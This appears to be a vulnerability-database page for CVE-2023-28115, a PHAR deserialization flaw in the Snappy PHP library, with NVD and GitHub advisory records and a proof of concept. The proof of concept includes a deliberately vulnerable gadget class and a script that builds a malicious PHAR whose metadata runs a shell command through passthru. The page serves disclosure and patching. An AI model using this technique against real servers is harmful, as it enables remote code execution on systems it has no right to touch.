            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-03-24T16:40Z",
      "publishedDate": "2023-03-17T22:15Z"
    }
  }
}

fkie_cve-2023-28115

Vulnerability from fkie_nvd

Published

2023-03-17 22:15

Modified

2024-11-21 07:54

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670	Product
security-advisories@github.com	https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/pull/469	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	Release Notes
security-advisories@github.com	https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/pull/469	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	Release Notes
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	knplabs	snappy	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "63871084-34B8-4CD8-ACEC-3EEAE2CA2EFE",
              "versionEndExcluding": "1.4.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
    }
  ],
  "id": "CVE-2023-28115",
  "lastModified": "2024-11-21T07:54:26.183",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-03-17T22:15:11.437",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-gq6w-q6wh-jggc

Vulnerability from github

Published

2023-03-17 18:24

Modified

2023-03-20 13:59

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

PHAR deserialization allowing remote code execution

Details

Description

snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization.

Proof of Concept

Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code.

```php

callback, $this->fileName); } } $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('

Bill

You owe me money, dude.

', 'phar://poc.phar'); ``` As an attacker, we going to generate the malicious phar using this script. ```php callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload // Delete any existing PHAR archive with that name @unlink("poc.phar"); // Create a new archive $poc = new Phar("poc.phar"); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?>

```

Then run these command to generate the file

php php --define phar.readonly=0 generate_phar.php

Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.

Impact

This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.

Occurences

https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670

References

https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "knplabs/knp-snappy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-28115"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-17T18:24:24Z",
    "nvd_published_at": "2023-03-17T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "## Description\n\nsnappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization.\n\n## Proof of Concept\n\nInstall Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code.\n\n```php\n\u003c?php\n// index.php\n\n// include autoloader\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n// reference the snappy namespace\nuse Knp\\Snappy\\Pdf;\n\n// vulnerable object\nclass VulnerableClass {\n    public $fileName;\n    public $callback;\n\n    function __destruct() {\n        call_user_func($this-\u003ecallback, $this-\u003efileName);\n    }\n}\n\n$snappy = new Pdf(\u0027/usr/local/bin/wkhtmltopdf\u0027);\n// generate pdf from html content and save it at phar://poc.phar\n$snappy-\u003egenerateFromHtml(\u0027\u003ch1\u003eBill\u003c/h1\u003e\u003cp\u003eYou owe me money, dude.\u003c/p\u003e\u0027, \u0027phar://poc.phar\u0027);\n```\n\nAs an attacker, we going to generate the malicious phar using this script.\n\n```php\n\u003c?php\n// generate_phar.php\n\nclass VulnerableClass { }\n// Create a new instance of the Dummy class and modify its property\n$dummy = new VulnerableClass();\n$dummy-\u003ecallback = \"passthru\";\n$dummy-\u003efileName = \"uname -a \u003e pwned\"; //our payload\n\n// Delete any existing PHAR archive with that name\n@unlink(\"poc.phar\");\n\n// Create a new archive\n$poc = new Phar(\"poc.phar\");\n\n// Add all write operations to a buffer, without modifying the archive on disk\n$poc-\u003estartBuffering();\n\n// Set the stub\n$poc-\u003esetStub(\"\u003c?php echo \u0027Here is the STUB!\u0027; __HALT_COMPILER();\");\n\n// Add a new file in the archive with \"text\" as its content\n$poc[\"file\"] = \"text\";\n\n// Add the dummy object to the metadata. This will be serialized\n$poc-\u003esetMetadata($dummy);\n\n// Stop buffering and write changes to disk\n$poc-\u003estopBuffering();\n?\u003e\n```\n\nThen run these command to generate the file\n\n```php\nphp --define phar.readonly=0 generate_phar.php\n```\n\nThen execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.\n\n## Impact\n\nThis vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.\n\n## Occurences\n\n\u003chttps://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\u003e\n\n## References\n\n- \u003chttps://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/\u003e",
  "id": "GHSA-gq6w-q6wh-jggc",
  "modified": "2023-03-20T13:59:30Z",
  "published": "2023-03-17T18:24:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28115"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/KnpLabs/snappy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PHAR deserialization allowing remote code execution"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2023-28115 (GCVE-0-2023-28115)

Vulnerability from cvelistv5

gsd-2023-28115

Vulnerability from gsd

fkie_cve-2023-28115

Vulnerability from fkie_nvd

ghsa-gq6w-q6wh-jggc

Vulnerability from github

Description

Proof of Concept

Bill

Impact

Occurences

References

Tags

Sightings

Nomenclature